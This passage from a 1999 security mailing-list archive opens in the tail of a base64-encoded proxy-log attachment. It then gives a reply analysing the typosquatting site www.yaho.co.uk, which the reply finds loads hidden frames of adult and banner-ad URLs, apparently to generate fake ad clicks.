  347. OjE3OjQ4ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuc3RhcnNhZHMuY29tL2NnaS1iaW4vY2xpY2su
  348. Y2dpP0lEPU51dHp3ZXJrIEhUVFAvMS4wIiAzMDIgMjc1DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJj
  349. aC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjQ4ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cu
  350. Q2FzaW5vRmFudGFzeS5jb206ODA4MC9pbWcvY3VydGFpbi5naWYgSFRUUC8xLjAiIDIwMCA0Mjc1
  351. DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjQ5
  352. ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206ODA4MC9pbWcvZnJlbmNo
  353. LmdpZiBIVFRQLzEuMCIgMjAwIDEwNjgNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0g
  354. LSBbMDgvRmViLzE5OTk6MTg6MTc6NTAgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50
  355. YXN5LmNvbTo4MDgwL2ltZy9qYXBhbmVzZS5naWYgSFRUUC8xLjAiIDIwMCAxMDY2DQpzdXBwb3J0
  356. LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjUwICswMDAwXSAi
  357. R0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206ODA4MC9pbWcvc3BhbmlzaC5naWYgSFRU
  358. UC8xLjAiIDIwMCAxMDExDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0Zl
  359. Yi8xOTk5OjE4OjE3OjUyICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206
  360. ODA4MC9pbWcva29ydGV4dC5naWYgSFRUUC8xLjAiIDIwMCA4OTcNCnN1cHBvcnQuZ2VtaW5pLXJl
  361. c2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6NTMgKzAwMDBdICJHRVQgaHR0cDov
  362. L3d3dy5iYW5uZXJicm9rZXJzLmNvbS9jZ2ktYmluL2Jhbm5lci5jZ2k/cHJvZmlsZTEmd29ubmUx
  363. NSBIVFRQLzEuMCIgMjAwIDExNDg0DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0g
  364. WzA4L0ZlYi8xOTk5OjE4OjE3OjUzICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFz
  365. eS5jb206ODA4MC9pbWcvY2hpbmVzZS5naWYgSFRUUC8xLjAiIDIwMCAxMTc1DQpzdXBwb3J0Lmdl
  366. bWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjU0ICswMDAwXSAiR0VU
  367. IGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206ODA4MC9pbWcvbmV0aGVybGFuZHMuZ2lmIEhU
  368. VFAvMS4wIiAyMDAgMTA1NQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9G
  369. ZWIvMTk5OToxODoxNzo1NCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29t
  370. OjgwODAvaW1nL3BvcnR1Z2FsLmdpZiBIVFRQLzEuMCIgMjAwIDEyNzMNCnN1cHBvcnQuZ2VtaW5p
  371. LXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6NTQgKzAwMDBdICJHRVQgaHR0
  372. cDovL3d3dy5DYXNpbm9GYW50YXN5LmNvbTo4MDgwL2ltZy9zd2VlZGlzaC5naWYgSFRUUC8xLjAi
  373. IDIwMCAxMDgzDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5
  374. OjE4OjE3OjU0ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206ODA4MC9p
  375. bWcvd2lubW9uZXkuZ2lmIEhUVFAvMS4wIiAyMDAgMzE2Nw0Kc3VwcG9ydC5nZW1pbmktcmVzZWFy
  376. Y2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo1NCArMDAwMF0gIkdFVCBodHRwOi8vd3d3
  377. LkNhc2lub0ZhbnRhc3kuY29tOjgwODAvaW1nL2l0YWxpYW4uZ2lmIEhUVFAvMS4wIiAyMDAgMTA2
  378. Ng0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo1
  379. NSArMDAwMF0gIkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29tOjgwODAvaW1nL2NoaXRl
  380. eHQuZ2lmIEhUVFAvMS4wIiAyMDAgODkyDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAt
  381. IC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjU2ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFu
  382. dGFzeS5jb206ODA4MC9pbWcvYnV0dG9uc2UuZ2lmIEhUVFAvMS4wIiAyMDAgMzY0OQ0Kc3VwcG9y
  383. dC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo1NiArMDAwMF0g
  384. IkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29tOjgwODAvaW1nL2VudHJhbmNlaGVhZGVy
  385. LmdpZiBIVFRQLzEuMCIgMjAwIDczMTkNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0g
  386. LSBbMDgvRmViLzE5OTk6MTg6MTg6MDMgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50
  387. YXN5LmNvbTo4MDgwL2ltZy9lbnRyYW5jZWdpcmwuZ2lmIEhUVFAvMS4wIiAyMDAgMTc3NTINCnN1
  388. cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTg6MDUgKzAw
  389. MDBdICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50YXN5LmNvbTo4MDgwL2ltZy9lbnRyYW5jZS5n
  390. aWYgSFRUUC8xLjAiIDIwMCA1NjcwNQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAt
  391. IFswOC9GZWIvMTk5OToxODoxODoxMCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNv
  392. bS8gSFRUUC8xLjAiIDIwMCA1MjU1DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0g
  393. WzA4L0ZlYi8xOTk5OjE4OjE4OjExICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuc3RhcnNhZHMuY29t
  394. L2ltYWdlcy9iYXJyaWdodHllbC5naWYgSFRUUC8xLjAiIDIwMCA5MTgNCnN1cHBvcnQuZ2VtaW5p
  395. LXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTg6MTIgKzAwMDBdICJHRVQgaHR0
  396. cDovL3d3dy5zdGFyc2Fkcy5jb20vaW1hZ2VzL2JhcjExYi5naWYgSFRUUC8xLjAiIDIwMCA1MzUN
  397. CnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTg6MTIg
  398. KzAwMDBdICJHRVQgaHR0cDovL3d3dy5zdGFyc2Fkcy5jb20vaW1hZ2VzL2JhcnJpZ2h0LmdpZiBI
  399. VFRQLzEuMCIgMjAwIDkxNQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9G
  400. ZWIvMTk5OToxODoxODoxMiArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9pbWFn
  401. ZXMvYmFyMTBiLmdpZiBIVFRQLzEuMCIgMjAwIDUzMg0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2gu
  402. Y28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODoxMyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0
  403. YXJzYWRzLmNvbS9jZ2ktYmluL3NlcnZlLmNnaT9JRD1OZXRzdGFycyBIVFRQLzEuMCIgMzAyIDI5
  404. MQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODox
  405. MyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9pbWFnZXMvbmV0c2NhcGU0Lmdp
  406. ZiBIVFRQLzEuMCIgMjAwIDk4Ng0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFsw
  407. OC9GZWIvMTk5OToxODoxODoxNCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9p
  408. bWFnZXMvYmFyMTBhLmdpZiBIVFRQLzEuMCIgMjAwIDUyNg0Kc3VwcG9ydC5nZW1pbmktcmVzZWFy
  409. Y2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODoxNCArMDAwMF0gIkdFVCBodHRwOi8vd3d3
  410. LnN0YXJzYWRzLmNvbS9pbWFnZXMvYmFyMTFhLmdpZiBIVFRQLzEuMCIgMjAwIDUyNw0Kc3VwcG9y
  411. dC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODoxNCArMDAwMF0g
  412. IkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9pbWFnZXMvYmFyZG93bnllbC5naWYgSFRUUC8x
  413. LjAiIDIwMCA5MTQNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5
  414. OTk6MTg6MTg6MTUgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5zdGFyc2Fkcy5jb20vYXguY2dpP2xv
  415. Z28uZ2lmIEhUVFAvMS4wIiAzMDIgMjYwDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAt
  416. IC0gWzA4L0ZlYi8xOTk5OjE4OjE4OjE1ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuc3RhcnNhZHMu
  417. Y29tL2Jhbm5lcnMvdXNhLmdpZiBIVFRQLzEuMCIgMjAwIDEwMzE2DQpzdXBwb3J0LmdlbWluaS1y
  418. ZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE4OjE2ICswMDAwXSAiR0VUIGh0dHA6
  419. Ly93d3cuc3RhcnNhZHMuY29tL2ltYWdlcy9iYXJkb3duLmdpZiBIVFRQLzEuMCIgMjAwIDkxNg0K
  420. c3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODoxOCAr
  421. MDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9pbWFnZXMvaWUzLmdpZiBIVFRQLzEu
  422. MCIgMjAwIDExMTENCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5
  423. OTk6MTg6MTg6MTkgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5zdGFyc2Fkcy5jb20vbG9nby5naWYg
  424. SFRUUC8xLjAiIDIwMCA0MzgxDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4
  425. L0ZlYi8xOTk5OjE4OjIwOjQ2ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cueWFob28uY28udWsvIEhU
  426. VFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIv
  427. MTk5OToxODoyMDo0NyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG9vLmNvLnVrL2ltYWdlcy91
  428. a19tYWluNGMuZ2lmIEhUVFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28u
  429. dWsgLSAtIFswOC9GZWIvMTk5OToxODoyMDo0NyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG9v
  430. LmNvLnVrL2Fkdi9pbWFnZXMveWNsaWNrX3dvcmsyX2htcGdfdWsuZ2lmIEhUVFAvMS4wIiAzMDQg
  431. LQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoyMDo0
  432. NyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG9vLmNvLnVrL2ltYWdlcy9zbS5naWYgSFRUUC8x
  433. LjAiIDMwNCAtDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5
  434. OjE4OjIxOjA2ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cueWFob28uY29tLyBIVFRQLzEuMCIgMjAw
  435. IDkyMTENCg==
  436.  
  437. --=_5A0DDE8C.57365AD0--
  438.  
  439.    * Next message: Michael: "FakeBo 0.3.1 & nmap"
  440.    * Previous message: David LeBlanc: "Re: ISS Internet Scanner Cannot be
  441.      relied upon for conclusive"
  442.    * Next in thread: Paul McGovern: "Re: Spoofed Yahoo web site -
  443.      www.yaho.co.uk"
  444.  
  445.  
  446.  
  447. Re: Spoofed Yahoo web site - www.yaho.co.uk
  448.  
  449. Paul McGovern (isles@LAMER.NET)
  450. Tue, 9 Feb 1999 17:49:00 -0500
  451.  
  452.    * Messages sorted by: [ date ][ thread ][ subject ][ author ]
  453.    * Next message: Brandon S. Allbery: "Re: SSH 1.x and 2.x Daemon"
  454.    * Previous message: A. C. Eufemio: "Security Scanners and other Auditing
  455.      Tools [was Re: ISS Internet"
  456.    * In reply to: Paul Murphy: "Spoofed Yahoo web site - www.yaho.co.uk"
  457.  
  458. On Mon, 8 Feb 1999, Paul Murphy wrote:
  459.  
  460. | Hi,
  461. |
  462. | You might like to try this one on for size, and advise whether there's
  463. | anything nasty going on behind this site.....
  464.  
  465. Going to this site in lynx, we're given a page with the following link on
  466. it:
  467.                        The requested URL probably is:
  468.  
  469.                            http://www.yahoo.co.uk
  470.  
  471. however, the link behind this is actually
  472. http://www.aae.net/typo/typolink.shtml. Following this link takes you to a
  473. page with one main frame (which has the actual link to
  474. http://www.yahoo.co.uk) and 14 others, which under netscape for linux are
  475. hidden. However, of course, lynx tells us where they go :> the sites they
  476. lead to are:
  477.  
  478. http://199.217.203.16/stats.asp?sb5553
  479. http://www.gaytradition.com/trafficcash/trafficcash.cgi?nutzw1
  480. http://cgi2.hotshots.net/0/nutzw1
  481. http://adultad.hotlynxxx.com/hotapi.wsa/GIF1852
  482. http://ad.xxxteen.com/INDEX_2632.shtml
  483. http://ad.xxxpic.com/adult/21/INDEX_2675.shtml
  484. http://ad.xxxteen.com/INDEX_2709.shtml
  485. http://ad.mpgworld.com/INDEX_2661.shtml
  486. http://ad.xxxteen.com/indexmain.shtml
  487. http://ad.xxxpic.com/adult/21/start.htm
  488. http://ad.mpgworld.com/start.htm
  489.  
  490. with a couple of them repeated. Under netscape for linux, it automatically
  491. refreshed my browser to www.yahoo.co.uk but watching the status bar i
  492. could see netscape trying to look up all of these sites so I know it was
  493. working in the background to connect to those sites. Pretty harmless,
  494. looks to me like someone's little scheme to generate fake 'banner clicks,'
  495. pretty lame but more original than spamming eh? Anyway, it doesn't look
  496. like this has anything malicious like a session watcher behind it, just
  497. someone's idea of making a little spare cash. Of course, I could be
  498. wrong... this is all just speculation :> Regards,
  499.  
  500. -=--=--=--=--=--=--=--=--=--=--=--=--=--=-
  501. Paul McGovern (nyisles) - isles@lamer.net
  502. BSBW Public Library - Technical Assistant
  503. Administrator - redemption.bc.ca.xnet.org
  504. Administrator - krad.fef.net
  505. http://www.krad.org (under construction)
  506. -=--=--=--=--=--=--=--=--=--=--=--=--=--=-
  507.  
  508.    * Next message: Brandon S. Allbery: "Re: SSH 1.x and 2.x Daemon"
  509.    * Previous message: A. C. Eufemio: "Security Scanners and other Auditing
  510.      Tools [was Re: ISS Internet"
  511.    * In reply to: Paul Murphy: "Spoofed Yahoo web site - www.yaho.co.uk"
  512.